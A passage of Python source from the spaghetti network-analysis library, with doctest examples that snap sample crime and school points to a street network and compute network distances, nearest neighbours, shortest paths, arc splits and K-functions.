>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
>>> counts = ntw.count_per_link(
... ntw.pointpatterns["crimes"].obs_to_arc, graph=False
... )
>>> counts[(140, 142)]
10
>>> s = sum([v for v in list(counts.values())])
>>> s
287
"""
# instantiate observation counts by link lookup
counts = {}
# graph-theoretic object of nodes and edges
if graph:
# iterate the links-to-observations lookup
for key, observations in obs_on.items():
# isolate observation count for the link
cnt = len(observations)
# extract link (edges) key
if key in self.arcs_to_edges.keys():
key = self.arcs_to_edges[key]
                # either add to the current count for an existing
                # dictionary entry or create a new dictionary entry
try:
counts[key] += cnt
except KeyError:
counts[key] = cnt
# network object of arcs and vertices
else:
# simplified version of the above process
for key in obs_on.keys():
counts[key] = len(obs_on[key])
return counts
def _newpoint_coords(self, arc, distance):
"""Used internally to compute new point coordinates during snapping."""
# extract coordinates for vertex 1 of arc
x1 = self.vertex_coords[arc[0]][0]
y1 = self.vertex_coords[arc[0]][1]
# extract coordinates for vertex 2 of arc
x2 = self.vertex_coords[arc[1]][0]
y2 = self.vertex_coords[arc[1]][1]
# if the network arc is vertical set the (x) coordinate
# and proceed to calculating the (y) coordinate
if x1 == x2:
x0 = x1
# if the vertical direction is positive from
# vertex 1 to vertex 2 on the euclidean plane
if y1 < y2:
y0 = y1 + distance
# if the vertical direction is negative from
# vertex 1 to vertex 2 on the euclidean plane
# -- this shouldn't happen due to vertex sorting in
# -- self._extractnetwork() and self.extractgraph()
elif y1 > y2:
y0 = y2 + distance
# otherwise the link is zero-length
# -- this should never happen
else:
y0 = y1
return x0, y0
# calculate the slope of the arc, `m`
m = (y2 - y1) / (x2 - x1)
# if the horizontal direction is negative from
# vertex 1 to vertex 2 on the euclidean plane
if x1 > x2:
x0 = x1 - distance / numpy.sqrt(1 + m ** 2)
# if the horizontal direction is positive from
# vertex 1 to vertex 2 on the euclidean plane
elif x1 < x2:
x0 = x1 + distance / numpy.sqrt(1 + m ** 2)
# calculate the (y) coordinate
y0 = m * (x0 - x1) + y1
# the new (x,y) coordinates for the snapped observation
return x0, y0
def simulate_observations(self, count, distribution="uniform"):
"""Generate a simulated point pattern on the network.
Parameters
----------
count : int
The number of points to create.
distribution : str
A distribution of random points. Currently, the only
supported distribution is uniform.
Returns
-------
        simpts : spaghetti.SimulatedPointPattern
            Simulated observations snapped to the network, including snapped
            coordinates and distances to the bounding vertices of each assigned arc.
See also
--------
numpy.random.Generator.uniform
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Isolate the number of points in the dataset.
>>> npts = ntw.pointpatterns["crimes"].npoints
>>> npts
287
Simulate ``npts`` number of points along the network
in a `uniform` distribution.
>>> sim = ntw.simulate_observations(npts)
>>> isinstance(sim, spaghetti.network.SimulatedPointPattern)
True
>>> sim.npoints
287
"""
# instantiate an empty `SimulatedPointPattern()`
simpts = SimulatedPointPattern()
# record throw-away arcs enumerator
arcs_ = []
# create array and fill each entry as length of network arc
lengths = numpy.zeros(len(self.arc_lengths))
for i, key in enumerate(self.arc_lengths.keys()):
arcs_.append(key)
lengths[i] = self.arc_lengths[key]
# cumulative network length
stops = numpy.cumsum(lengths)
cumlen = stops[-1]
# create lengths with a uniform distribution
if distribution.lower() == "uniform":
nrandompts = numpy.random.uniform(0, cumlen, size=(count,))
else:
msg = "%s distribution not currently supported." % distribution
raise RuntimeError(msg)
# iterate over random distances created above
for i, r in enumerate(nrandompts):
            # take the first element of the index array (arc ID) where the
            # cumulative length in `stops` exceeds the random distance
idx = numpy.where(r < stops)[0][0]
# assign the simulated point to the arc
assignment_arc = arcs_[idx]
# calculate and set the distance from the arc start
distance_from_start = stops[idx] - r
# populate the coordinates dict
x0, y0 = self._newpoint_coords(assignment_arc, distance_from_start)
# record the snapped coordinates and associated vertices
simpts.snapped_coordinates[i] = (x0, y0)
simpts.obs_to_vertex[assignment_arc[0]].append(i)
simpts.obs_to_vertex[assignment_arc[1]].append(i)
# calculate and set the distance from the arc end
distance_from_end = self.arc_lengths[arcs_[idx]] - distance_from_start
# populate the distances to vertices
simpts.dist_to_vertex[i] = {
assignment_arc[0]: distance_from_start,
assignment_arc[1]: distance_from_end,
}
# set snapped coordinates and point count attributes
simpts.points = simpts.snapped_coordinates
simpts.npoints = len(simpts.points)
return simpts
def enum_links_vertex(self, v0):
"""Returns the arcs (links) adjacent to vertices.
Parameters
-----------
v0 : int
The vertex ID.
Returns
-------
links : list
List of tuple arcs adjacent to the vertex.
Examples
--------
Create an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Enumerate the links/arcs that are adjacent to vertex ``24``.
>>> ntw.enum_links_vertex(24)
[(24, 48), (24, 25), (24, 26)]
"""
# instantiate links list
links = []
neighbor_vertices = self.adjacencylist[v0]
# enumerate links associated with the current vertex
for n in neighbor_vertices:
links.append(tuple(sorted([n, v0])))
return links
def full_distance_matrix(self, n_processes, gen_tree=False):
"""All vertex-to-vertex distances on a network. This method
is called from within ``allneighbordistances()``,
``nearestneighbordistances()``, and ``distancebandweights()``.
Parameters
-----------
n_processes : int
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
Notes
-----
Based on :cite:`Dijkstra1959a` and :cite:`doi:10.1002/9781119967101.ch3`.
"""
# create an empty matrix which will store shortest path distance
nvtx = len(self.vertex_list)
self.distance_matrix = numpy.empty((nvtx, nvtx))
# create `network_trees` attribute that stores
# all network path trees (if desired)
self.network_trees = {}
# single-core processing
if n_processes == 1:
# iterate over each network vertex
for vtx in self.vertex_list:
# calculate the shortest path and preceding
# vertices for traversal route
distance, pred = util.dijkstra(self, vtx)
pred = numpy.array(pred)
# generate the shortest path tree
if gen_tree:
tree = util.generatetree(pred)
else:
tree = None
# populate distances and paths
self.distance_matrix[vtx] = distance
self.network_trees[vtx] = tree
# multiprocessing
else:
# set up multiprocessing schema
import multiprocessing as mp
from itertools import repeat
if n_processes == "all":
cores = mp.cpu_count()
else:
cores = n_processes
p = mp.Pool(processes=cores)
# calculate the shortest path and preceding
# vertices for traversal route by mapping each process
distance_pred = p.map(util.dijkstra_mp, zip(repeat(self), self.vertex_list))
# set range of iterations
iterations = range(len(distance_pred))
# fill shortest paths
distance = [distance_pred[itr][0] for itr in iterations]
# fill preceding vertices
pred = numpy.array([distance_pred[itr][1] for itr in iterations])
# iterate of network vertices and generate
# the shortest path tree for each
for vtx in self.vertex_list:
if gen_tree:
tree = util.generatetree(pred[vtx])
else:
tree = None
# populate distances and paths
self.distance_matrix[vtx] = distance[vtx]
self.network_trees[vtx] = tree
def allneighbordistances(
self,
sourcepattern,
destpattern=None,
fill_diagonal=None,
n_processes=1,
gen_tree=False,
snap_dist=False,
):
"""Compute either all distances between :math:`i` and :math:`j` in a
single point pattern or all distances between each :math:`i` from a
source pattern and all :math:`j` from a destination pattern.
Parameters
----------
sourcepattern : {str, spaghetti.PointPattern}
The key of a point pattern snapped to the network or
the full ``spaghetti.PointPattern`` object.
destpattern : str
(Optional) The key of a point pattern snapped to the network
or the full ``spaghetti.PointPattern`` object.
fill_diagonal : {float, int}
(Optional) Fill the diagonal of the cost matrix. Default is
``None`` and will populate the diagonal with ``numpy.nan``.
Do not declare a ``destpattern`` for a custom
``fill_diagonal``.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
Returns
-------
nearest : numpy.ndarray
An array of shape (n,m) storing distances between all
source and destination points.
tree_nearest : dict
Nearest network node to point pattern vertex shortest
path lookup. The values of the dictionary are a tuple
of the nearest source vertex and the nearest destination
vertex to query the lookup tree. If two observations are
snapped to the same network arc a flag of -.1 is set for
both the source and destination network vertex
indicating the same arc is used while also raising an
``IndexError`` when rebuilding the path.
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> import numpy
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(
... examples.get_path("crimes.shp"), "crimes", attribute=True
... )
Calculate all distances between observations in the ``crimes`` dataset.
>>> s2s_dist = ntw.allneighbordistances("crimes")
If calculating a ``type-a`` to ``type-a`` distance matrix
the distance between an observation and itself is ``nan`` and
        the distance between one observation and another will be a positive value.
>>> s2s_dist[0,0], s2s_dist[1,0]
(nan, 3105.189475447081)
If calculating a ``type-a`` to ``type-b`` distance matrix
the distance between all observations will likely be positive
values, may be zero (or approximately zero), but will never be negative.
>>> ntw.snapobservations(
... examples.get_path("schools.shp"), "schools", attribute=False
... )
>>> s2d_dist = ntw.allneighbordistances("crimes", destpattern="schools")
>>> numpy.round((s2d_dist[0,0], s2d_dist[1,0]), 5)
array([4520.72354, 6340.42297])
Shortest paths can also be reconstructed when desired by
setting the ``gen_tree`` keyword argument to ``True``. Here
it is shown that the shortest path between school ``6`` and
school ``7`` flows along network arcs through network
vertices ``173`` and ``64``. The ``ntw.network_trees`` attribute
may then be queried for the network elements comprising that path.
>>> d2d_dist, tree = ntw.allneighbordistances("schools", gen_tree=True)
>>> tree[(6, 7)]
(173, 64)
"""
# calculate the network vertex to vertex distance matrix
# if it is not already an attribute
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# set the source and destination observation point patterns
if type(sourcepattern) is str:
sourcepattern = self.pointpatterns[sourcepattern]
if destpattern:
destpattern = self.pointpatterns[destpattern]
# source pattern setup
# set local copy of source pattern index
src_indices = list(sourcepattern.points.keys())
# set local copy of source distance to vertex lookup
src_d2v = copy.deepcopy(sourcepattern.dist_to_vertex)
# source point count
nsource_pts = len(src_indices)
# create source point to network vertex lookup
src_vertices = {}
for s in src_indices:
v1, v2 = src_d2v[s].keys()
src_vertices[s] = (v1, v2)
# destination pattern setup
# if only a source pattern is specified, also set it as
# the destination pattern
symmetric = False
if destpattern is None:
symmetric = True
destpattern = sourcepattern
# set local copy of destination pattern index
dest_indices = list(destpattern.points.keys())
# set local copy of destination distance to vertex lookup
dst_d2v = copy.deepcopy(destpattern.dist_to_vertex)
# destination point count
ndest_pts = len(dest_indices)
# create `deepcopy` of destination points to
# consider for searching
dest_searchpts = copy.deepcopy(dest_indices)
# create destination point to network vertex lookup
dest_vertices = {}
for s in dest_indices:
v1, v2 = dst_d2v[s].keys()
dest_vertices[s] = (v1, v2)
# add snapping distance to each pointpattern
if snap_dist:
# declare both point patterns and both
            # distance-to-vertex lookups in single lists
patterns = [sourcepattern, destpattern]
dist_copies = [src_d2v, dst_d2v]
# iterate over each point pattern
for elm, pp in enumerate(patterns):
# extract associated vertex distances
for pidx, dists_dict in dist_copies[elm].items():
# add snapped distance to each point
for vidx, vdist in dists_dict.items():
dists_dict[vidx] = vdist + pp.dist_snapped[pidx]
# output setup
# create empty source x destination array
# and fill with infinity values
nearest = numpy.empty((nsource_pts, ndest_pts))
nearest[:] = numpy.inf
# create empty dictionary to store path trees
tree_nearest = {}
# iterate over each point in sources
for p1 in src_indices:
# get the source vertices and dist to source vertices
source1, source2 = src_vertices[p1]
set1 = set(src_vertices[p1])
# distance from source vertex1 to point and
# distance from source vertex2 to point
sdist1, sdist2 = src_d2v[p1].values()
if symmetric:
# only compute the upper triangle if symmetric
dest_searchpts.remove(p1)
# iterate over each point remaining in destinations
for p2 in dest_searchpts:
# get the destination vertices and
# dist to destination vertices
dest1, dest2 = dest_vertices[p2]
set2 = set(dest_vertices[p2])
# when the observations are snapped to the same arc
if set1 == set2:
# calculate only the length between points along
# that arc
x1, y1 = sourcepattern.snapped_coordinates[p1]
x2, y2 = destpattern.snapped_coordinates[p2]
computed_length = util.compute_length((x1, y1), (x2, y2))
nearest[p1, p2] = computed_length
# set the nearest network vertices to a flag of -.1
# indicating the same arc is used while also raising
                    # an indexing error when rebuilding the path
tree_nearest[p1, p2] = SAME_SEGMENT
# otherwise lookup distance between the source and
# destination vertex
else:
# distance from destination vertex1 to point and
# distance from destination vertex2 to point
ddist1, ddist2 = dst_d2v[p2].values()
# set the four possible combinations of
# source to destination shortest path traversal
d11 = self.distance_matrix[source1][dest1]
d21 = self.distance_matrix[source2][dest1]
d12 = self.distance_matrix[source1][dest2]
d22 = self.distance_matrix[source2][dest2]
# find the shortest distance from the path passing
# through each of the two origin vertices to the
# first destination vertex
sd_1 = d11 + sdist1
sd_21 = d21 + sdist2
sp_combo1 = source1, dest1
if sd_1 > sd_21:
sd_1 = sd_21
sp_combo1 = source2, dest1
# now add the point to vertex1 distance on
# the destination arc
len_1 = sd_1 + ddist1
# repeat the prior but now for the paths entering
# at the second vertex of the second arc
sd_2 = d12 + sdist1
sd_22 = d22 + sdist2
sp_combo2 = source1, dest2
if sd_2 > sd_22:
sd_2 = sd_22
sp_combo2 = source2, dest2
len_2 = sd_2 + ddist2
# now find the shortest distance path between point
# 1 on arc 1 and point 2 on arc 2, and assign
sp_12 = len_1
s_vertex, d_vertex = sp_combo1
if len_1 > len_2:
sp_12 = len_2
s_vertex, d_vertex = sp_combo2
# set distance and path tree
nearest[p1, p2] = sp_12
tree_nearest[p1, p2] = (s_vertex, d_vertex)
if symmetric:
# mirror the upper and lower triangle
# when symmetric
nearest[p2, p1] = nearest[p1, p2]
# populate the main diagonal when symmetric
if symmetric:
            # fill the matrix diagonal with NaN values if no fill
            # value is specified
if fill_diagonal is None:
numpy.fill_diagonal(nearest, numpy.nan)
# otherwise fill with specified value
else:
numpy.fill_diagonal(nearest, fill_diagonal)
# if the nearest path tree is desired return it along
# with the cost matrix
if gen_tree:
return nearest, tree_nearest
else:
return nearest
def nearestneighbordistances(
self,
sourcepattern,
destpattern=None,
n_processes=1,
gen_tree=False,
all_dists=None,
snap_dist=False,
keep_zero_dist=True,
):
"""Compute the interpattern nearest neighbor distances or the
intrapattern nearest neighbor distances between a source
pattern and a destination pattern.
Parameters
----------
sourcepattern : str
The key of a point pattern snapped to the network.
destpattern : str
(Optional) The key of a point pattern snapped to the
network.
n_processes : {int, str}
Specify the number of cores to utilize. Default is 1 core.
Use ``"all"`` to request all available cores.
Specify the exact number of cores with an integer.
gen_tree : bool
Rebuild shortest path ``True``, or skip ``False``.
Default is ``False``.
all_dists : numpy.ndarray
An array of shape :math:`(n,n)` storing distances between all
points.
snap_dist : bool
Flag as ``True`` to include the distance from the original
location to the snapped location along the network. Default
is ``False``.
keep_zero_dist : bool
Include zero values in minimum distance ``True`` or exclude
``False``. Default is ``True``. If the source pattern is the
same as the destination pattern the diagonal is filled with
``numpy.nan``.
Returns
-------
nearest : dict
Nearest neighbor distances keyed by the source point ID with
            the value as a tuple of lists containing
nearest destination point ID(s) and distance.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(examples.get_path("crimes.shp"), "crimes")
Fetch nearest neighbor distances while (potentially)
keeping neighbors that have been geocoded directly on top of
each other. Here it is demonstrated that observation ``11``
has two neighbors (``18`` and ``19``) at an exactly equal distance.
However, observation ``18`` is shown to have only one neighbor
        (``19``) with no distance between them.
>>> nn = ntw.nearestneighbordistances("crimes", keep_zero_dist=True)
>>> nn[11], nn[18]
(([18, 19], 165.33982412719126), ([19], 0.0))
This may be remedied by setting the ``keep_zero_dist`` keyword
argument to ``False``. With this parameter set, observation ``11``
still has the same neighbor/distance values, but
observation ``18`` now has a single nearest neighbor (``11``)
        with a non-zero, positive distance.
>>> nn = ntw.nearestneighbordistances("crimes", keep_zero_dist=False)
>>> nn[11], nn[18]
(([18, 19], 165.33982412719126), ([11], 165.33982412719126))
There are valid reasons for both retaining or masking zero distance
neighbors. When conducting analysis, thought must be given as to
which model more accurately represents the specific scenario.
"""
        # raise an exception if the specified point pattern does not exist
if sourcepattern not in self.pointpatterns.keys():
err_msg = "Available point patterns are {}"
raise KeyError(err_msg.format(self.pointpatterns.keys()))
# calculate the network vertex to vertex distance matrix
# if it is not already an attribute
if not hasattr(self, "distance_matrix"):
self.full_distance_matrix(n_processes, gen_tree=gen_tree)
# determine if the source and destination patterns are equal
symmetric = sourcepattern != destpattern
# (for source-to-source patterns) if zero-distance neighbors are
# desired, keep the diagonal as NaN and take the minimum
# distance neighbor(s), which may include zero distance
        # neighbors.
fill_diagonal = None
if not keep_zero_dist and symmetric:
# (for source-to-source patterns) if zero-distance neighbors
# should be ignored, convert the diagonal to 0.0 and take
# the minimum distance neighbor(s) that is/are not 0.0
# distance.
fill_diagonal = 0.0
# set the source and destination observation point patterns
sourcepattern = self.pointpatterns[sourcepattern]
if destpattern:
destpattern = self.pointpatterns[destpattern]
# if the full source to destination is not calculated,
# do that at this time
if all_dists is None:
all_dists = self.allneighbordistances(
sourcepattern,
destpattern=destpattern,
fill_diagonal=fill_diagonal,
n_processes=n_processes,
gen_tree=gen_tree,
snap_dist=snap_dist,
)
# create empty nearest neighbors lookup
nearest = {}
# iterate over each source point
for source_index in sourcepattern.points.keys():
# this considers all zero-distance neighbors
if keep_zero_dist and symmetric:
val = numpy.nanmin(all_dists[source_index, :])
# this does not consider zero-distance neighbors
else:
val = numpy.min(
all_dists[source_index, :][
numpy.nonzero(all_dists[source_index, :])
]
)
# nearest destination (may be more than one if
# observations are equal distances away)
dest_idxs = numpy.where(all_dists[source_index, :] == val)[0].tolist()
# set nearest destination point(s) and distance
nearest[source_index] = (dest_idxs, val)
return nearest
def shortest_paths(self, tree, pp_orig, pp_dest=None, n_processes=1):
"""Return the shortest paths between observation points as
``libpysal.cg.Chain`` objects.
Parameters
----------
tree : dict
See ``tree_nearest`` in
``spaghetti.Network.allneighbordistances()``.
pp_orig : str
Origin point pattern for shortest paths.
See ``name`` in ``spaghetti.Network.snapobservations()``.
pp_dest : str
Destination point pattern for shortest paths.
See ``name`` in ``spaghetti.Network.snapobservations()``.
            Defaults to ``pp_orig`` if not declared.
n_processes : int
See ``n_processes`` in ``spaghetti.Network.full_distance_matrix()``.
Returns
-------
paths : list
The shortest paths between observations as geometric objects.
Each element of the list is a list where the first element
is an origin-destination pair tuple and the second
element is a ``libpysal.cg.Chain``.
Raises
------
AttributeError
This exception is raised when an attempt to extract shortest
            path geometries is being made but the ``network_trees``
attribute does not exist within the network object.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Snap observations to the network.
>>> ntw.snapobservations(examples.get_path("schools.shp"), "schools")
Create shortest path trees between observations.
>>> _, tree = ntw.allneighbordistances("schools", gen_tree=True)
Generate geometric objects from trees.
>>> paths = ntw.shortest_paths(tree, "schools")
Extract the first path, which is between observations
``0`` and ``1``.
>>> path = paths[0]
>>> path[0]
(0, 1)
        There are ``n`` vertices in the path between observations
``0`` and ``1``.
>>> n = len(path[1].vertices)
>>> n
10
"""
# build the network trees object if it is not already an attribute
if not hasattr(self, "network_trees"):
msg = "The 'network_trees' attribute has not been created. "
msg += "Rerun 'spaghetti.Network.allneighbordistances()' "
msg += "with the 'gen_tree' parameter set to 'True'."
raise AttributeError(msg)
# isolate network attributes
pp_orig = self.pointpatterns[pp_orig]
if pp_dest:
pp_dest = self.pointpatterns[pp_dest]
else:
pp_dest = pp_orig
vtx_coords = self.vertex_coords
net_trees = self.network_trees
# instantiate a list to store paths
paths = []
# iterate over each path in the tree
for idx, ((obs0, obs1), (v0, v1)) in enumerate(tree.items()):
# if the observations share the same segment
# create a partial segment path
if (v0, v1) == SAME_SEGMENT:
# isolate the snapped coordinates and put in a list
partial_segment_verts = [
cg.Point(pp_orig.snapped_coordinates[obs0]),
cg.Point(pp_dest.snapped_coordinates[obs1]),
]
path = partial_segment_verts
else:
# source and destination network vertices
svtx, dvtx = tree[obs0, obs1]
# path passes through these nodes
# (source and destination inclusive)
thru_nodes = net_trees[svtx][dvtx][::-1] + [dvtx]
# full-length network segments along path
full_segs_path = []
iter_limit = len(thru_nodes) - 1
for _idx, item in enumerate(islice(thru_nodes, iter_limit)):
full_segs_path.append((item, thru_nodes[_idx + 1]))
                # build chains for the full-length segments along the path
full_segments = []
for fsp in full_segs_path:
full_segments.append(util._chain_constr(vtx_coords, fsp))
# unpack the vertices containers
segm_verts = [v for fs in full_segments for v in fs.vertices]
# remove duplicate vertices
for idx, v in enumerate(segm_verts):
try:
if v == segm_verts[idx + 1]:
segm_verts.remove(v)
except IndexError as e:
if e.args[0] == "list index out of range":
continue
else:
raise
# partial-length network segments along path
partial_segment_verts = [
cg.Point(pp_orig.snapped_coordinates[obs0]),
cg.Point(pp_dest.snapped_coordinates[obs1]),
]
# combine the full and partial segments into a single list
first_vtx, last_vtx = partial_segment_verts
path = [first_vtx] + segm_verts + [last_vtx]
            # append the (origin, destination) pair and its path geometry
paths.append([(obs0, obs1), util._chain_constr(None, path)])
return paths
def split_arcs(self, split_param, split_by="distance", w_components=True):
"""Split all network arcs at either a fixed distance or fixed count.
Parameters
-----------
split_param : {int, float}
Either the number of desired resultant split arcs or
the distance at which arcs are split.
split_by : str
Either ``'distance'`` or ``'count'``. Default is ``'distance'``.
w_components : bool
Set to ``False`` to not record connected components from a
``libpysal.weights.W`` object. Default is ``True``.
Returns
-------
split_network : spaghetti.Network
A newly instantiated ``spaghetti.Network`` object.
Examples
--------
Instantiate a network.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(examples.get_path("streets.shp"))
Split the network into a segments of 200 distance units in length
(`US feet in this case <https://github.com/pysal/libpysal/blob/master/libpysal/examples/geodanet/streets.prj>`_.).
This will include "remainder" segments unless the network is
comprised of arcs with lengths exactly divisible by ``distance``.
>>> n200 = ntw.split_arcs(200.0)
>>> len(n200.arcs)
688
The number of arcs within the new object can be accessed via the
weights object, as well. These counts will be equal.
>>> len(n200.arcs) == n200.w_network.n
True
Neighboring arcs can also be queried through the weight object.
>>> n200.w_network.neighbors[72,392]
[(71, 72), (72, 252), (72, 391), (392, 393)]
Network arcs can also be split by a specified number of divisions with
the ``split_by`` keyword set to ``'count'``, which is ``'distance'`` by
default. For example, each arc can be split into 2 equal parts.
>>> n2 = ntw.split_arcs(2, split_by="count")
>>> len(n2.arcs)
606
"""
# catch invalid split types
split_by = split_by.lower()
valid_split_types = ["distance", "count"]
if split_by not in valid_split_types:
msg = f"'{split_by}' is not a valid value for 'split_by'. "
msg += f"Valid arguments include: {valid_split_types}."
raise ValueError(msg)
# catch invalid count params
if split_by == "count":
if split_param <= 1:
msg = "Splitting arcs by 1 or less is not possible. "
msg += f"Currently 'split_param' is set to {split_param}."
raise ValueError(msg)
split_integer = int(split_param)
if split_param != split_integer:
                msg = "Network arcs must be split by an integer. "
msg += f"Currently 'split_param' is set to {split_param}."
raise TypeError(msg)
# convert coordinates for integers if possible
# e.g., (1.0, 0.5) --> (1, 0.5)
int_coord = lambda c: int(c) if (type(c) == float and c.is_integer()) else c
# create new shell network instance
split_network = Network()
# duplicate input network attributes
split_network.adjacencylist = copy.deepcopy(self.adjacencylist)
split_network.arc_lengths = copy.deepcopy(self.arc_lengths)
split_network.arcs = copy.deepcopy(self.arcs)
split_network.vertex_coords = copy.deepcopy(self.vertex_coords)
split_network.vertex_list = copy.deepcopy(self.vertex_list)
split_network.vertices = copy.deepcopy(self.vertices)
split_network.pointpatterns = copy.deepcopy(self.pointpatterns)
split_network.in_data = self.in_data
# set vertex ID to start iterations
current_vertex_id = max(self.vertices.values())
# instantiate sets for newly created network arcs and
# input network arcs to remove
new_arcs = set()
remove_arcs = set()
# iterate over all network arcs
for arc in split_network.arcs:
# fetch network arc length
length = split_network.arc_lengths[arc]
# set initial segmentation interval
if split_by == "distance":
interval = split_param
else:
interval = length / float(split_param)
            # initialize the new arc length at zero
totallength = 0
# initialize the current vertex and ending vertex
currentstart, end_vertex = arc[0], arc[1]
# determine direction of arc vertices
csx, csy = split_network.vertex_coords[currentstart]
evx, evy = split_network.vertex_coords[end_vertex]
if csy > evy and csx == evx:
currentstart, end_vertex = end_vertex, currentstart
# if the arc will be split remove the current
# arc from the adjacency list
if interval < length:
# remove old arc adjacency information
split_network.adjacencylist[currentstart].remove(end_vertex)
split_network.adjacencylist[end_vertex].remove(currentstart)
# remove old arc length information
split_network.arc_lengths.pop(arc, None)
# add old arc to set of arcs to remove
remove_arcs.add(arc)
# if the arc will not be split, do nothing and continue
else:
continue
# traverse the length of the arc
while totallength < length:
# once an arc can not be split further
if totallength + interval >= length:
# record the ending vertex
currentstop = end_vertex
# set the length remainder
interval = length - totallength
# full old length reached
totallength = length
else:
# set the current vertex ID
current_vertex_id += 1
# set the current stopping ID
currentstop = current_vertex_id
# add the interval distance to the traversed length
totallength += interval
# compute the new vertex coordinate
newx, newy = self._newpoint_coords(arc, totallength)
new_vertex = (int_coord(newx), int_coord(newy))
# update the vertex and coordinate info if needed
if new_vertex not in split_network.vertices.keys():
split_network.vertices[new_vertex] = currentstop
split_network.vertex_coords[currentstop] = new_vertex
split_network.vertex_list.append(currentstop)
else:
# retrieve vertex ID if coordinate already exists
current_vertex_id -= 1
currentstop = split_network.vertices[new_vertex]
# update the new network adjacency list
split_network.adjacencylist[currentstart].append(currentstop)
split_network.adjacencylist[currentstop].append(currentstart)
                # record the new arc; the original arc container is still
                # being iterated over, so new arcs are merged in after the loop
_new_arc = tuple(sorted([currentstart, currentstop]))
new_arcs.add(_new_arc)
# set the length of the arc
split_network.arc_lengths[_new_arc] = interval
# increment the starting vertex to the stopping vertex
currentstart = currentstop
# add the newly created arcs to the network and remove the old arcs
split_network.arcs = set(split_network.arcs)
split_network.arcs.update(new_arcs)
split_network.arcs.difference_update(remove_arcs)
split_network.arcs = sorted(list(split_network.arcs))
# extract connected components
if w_components:
# extract contiguity weights from libpysal
split_network.w_network = split_network.contiguityweights(
graph=False, from_split=True
)
# identify connected components from the `w_network`
split_network.identify_components(split_network.w_network, graph=False)
# update the snapped point pattern
for instance in split_network.pointpatterns.values():
split_network._snap_to_link(instance)
return split_network
def GlobalAutoK(
self,
pointpattern,
nsteps=10,
permutations=99,
threshold=0.5,
distribution="uniform",
upperbound=None,
):
r"""Compute a global auto :math:`K`-function based on a network constrained
cost matrix through `Monte Carlo simulation <https://en.wikipedia.org/wiki/Monte_Carlo_method>`_
according to the formulation adapted from
:cite:`doi:10.1002/9780470549094.ch5`. See the **Notes**
section for further description.
Parameters
----------
pointpattern : spaghetti.PointPattern
A ``spaghetti`` point pattern object.
nsteps : int
The number of steps at which the count of the nearest
neighbors is computed. Default is ``10``.
permutations : int
The number of permutations to perform. Default is ``99``.
threshold : float
The level at which significance is computed.
(0.5 would be 97.5% and 2.5%). Default is ``0.5``.
distribution : str
The distribution from which random points are sampled.
Currently, the only supported distribution is ``'uniform'``.
upperbound : float
The upper bound at which the :math:`K`-function is computed.
Defaults to the maximum observed nearest neighbor distance.
Returns
-------
GlobalAutoK : spaghetti.analysis.GlobalAutoK
The global auto :math:`K`-function class instance.
Notes
-----
The :math:`K`-function can be formulated as:
.. math::
\displaystyle K(r)=\frac{\sum^n_{i=1} \#[\hat{A} \in D(a_i, r)]}{n\lambda},
        where :math:`n` is the set cardinality of :math:`A`, :math:`\hat{A}` is the subset of
observations in :math:`A` that are within :math:`D` units of distance from :math:`a_i`
(each single observation in :math:`A`), and :math:`r` is the range of distance
values over which the :math:`K`-function is calculated. The :math:`\lambda` term
is the intensity of observations along the network, calculated as:
.. math::
\displaystyle \lambda = \frac{n}{\big|N_{arcs}\big|},
where :math:`\big|N_{arcs}\big|` is the summed length of network arcs.
The global auto :math:`K`-function measures overall clustering in one set of
observations by comparing all intra-set distances over a range of
distance buffers :math:`D \in r`. The :math:`K`-function improves upon
nearest-neighbor distance measures through the analysis of all neighbor
distances. For an explanation on how to interpret the results of the
:math:`K`-function see the `Network Spatial Dependence tutorial <https://pysal.org/spaghetti/notebooks/network-spatial-dependence.html>`_.
For original implementation see :cite:`Ripley1976`
and :cite:`Ripley1977`.
For further Network-`K` formulations see
:cite:`doi:10.1111/j.1538-4632.2001.tb00448.x`,
:cite:`doi:10.1002/9781119967101.ch6`, and
:cite:`Baddeley2020`.
See also
--------
pointpats.K
Examples
--------
Create a network instance.
>>> import spaghetti
>>> from libpysal import examples
>>> ntw = spaghetti.Network(in_data=examples.get_path("streets.shp"))
Snap observation points onto the network.
>>> pt_str = "schools"
>>> in_data = examples.get_path(pt_str+".shp")
>>> ntw.snapobservations(in_data, pt_str, attribute=True)
>>> schools = ntw.pointpatterns[pt_str]
Compute a :math:`K`-function from school observations
with ``99`` ``permutations`` at ``10`` intervals.
>>> kres = ntw.GlobalAutoK(schools, permutations=99, nsteps=10)
>>> kres.lowerenvelope.shape[0]
10
"""
# call analysis.GlobalAutoK
return GlobalAutoK(
self,
pointpattern,
nsteps=nsteps,
permutations=permutations,
threshold=threshold,
distribution=distribution,
upperbound=upperbound,
)
def Moran(self, pp_name, permutations=999, graph=False):
"""Calculate a Moran's *I* statistic on a set of observations
based on network arcs. The Moran’s *I* test statistic allows
for the inference of how clustered (or dispersed) a dataset is
while considering both attribute values and spatial relationships.
        A value closer to +1 indicates absolute clustering while a
        value closer to -1 indicates absolute dispersion. Complete
spatial randomness takes the value of 0. See the
